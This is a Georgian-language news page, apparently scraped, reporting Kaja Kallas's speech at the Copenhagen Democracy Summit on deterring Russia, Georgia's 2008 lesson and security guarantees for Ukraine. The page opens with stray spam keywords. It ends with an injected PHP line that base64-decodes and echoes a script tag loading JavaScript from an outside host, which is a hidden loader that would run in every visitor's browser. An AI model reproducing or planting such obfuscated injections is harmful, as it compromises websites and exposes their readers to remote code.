gorgia
ავერსი jaluzi

დემოკრატიებს ძლიერი დაცვა სჭირდებათ, მხოლოდ ხელშეკრულებები ვერასდროს უზრუნველყოფს მშვიდობას, საქართველომ ეს 2008 წელს ისწავლა, – ამის შესახებ საგარეო პოლიტიკისა და უსაფრთხოების საკითხებში ევროკავშირის უმაღლესმა წარმომადგენელმა, კაია კალასმა კოპენჰაგენში დემოკრატიის სამიტზე სიტყვით გამოსვლისას განაცხადა.

კაია კალასის თქმით, სიძლიერე აკავებს აგრესორს.

„დემოკრატიებს ძლიერი დაცვა სჭირდებათ. მხოლოდ ხელშეკრულებები ვერასდროს უზრუნველყოფს მშვიდობას. საქართველომ ეს 2008 წელს ისწავლა. უკრაინამ ეს 2014 წელს ისწავლა ყირიმის ანექსიით და ახლა უკვე რუსეთის სამწლიანი სრულმასშტაბიანი ინტერვენციით. ჩვენს ხელთაა პასუხი კითხვაზე, როგორ შევაჩეროთ რუსეთის მიერ დემოკრატიების წინააღმდეგ აგრესიის ისტორიული ციკლი. სიძლიერე არის პასუხი. სიძლიერე აკავებს აგრესორს, სისუსტე ეპატიჟება მათ. უსაფრთხოების ძლიერი გარანტიები ნიშნავს ძლიერ უკრაინას. კიევს არ შეუძლია, მიიღოს ბუდაპეშტის მორიგი მემორანდუმი – მხოლოდ სიტყვები არასდროს არის საკმარისი უსაფრთხოების გარანტიებისთვის, სწორედ ამიტომ ევროკავშირი და მისი წევრი სახელმწიფოები არიან უკრაინის შეიარაღებული ძალების უდიდესი მხარდამჭერები და სწორედ ამიტომ უსაფრთხოების ძლიერი გარანტიები უნდა იყოს უკრაინის ნებისმიერი სამშვიდობო შეთანხმების ნაწილი“, – განაცხადა კალასმა.

კაია კალასის თქმით, ომის დასასრულებლად საჭიროა რუსეთზე ზეწოლის გაზრდა და უკრაინის გაძლიერება ბრძოლის ველზე.

როგორც კალასმა აღნიშნა, რუსეთი სანქციების შემსუბუქებას ითხოვს, რაც იმის დასტურია, რომ სანქციები მუშაობს, რადგან წინააღმდეგ შემთხვევაში, მოსკოვი ამას არ ითხოვდა.

129
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");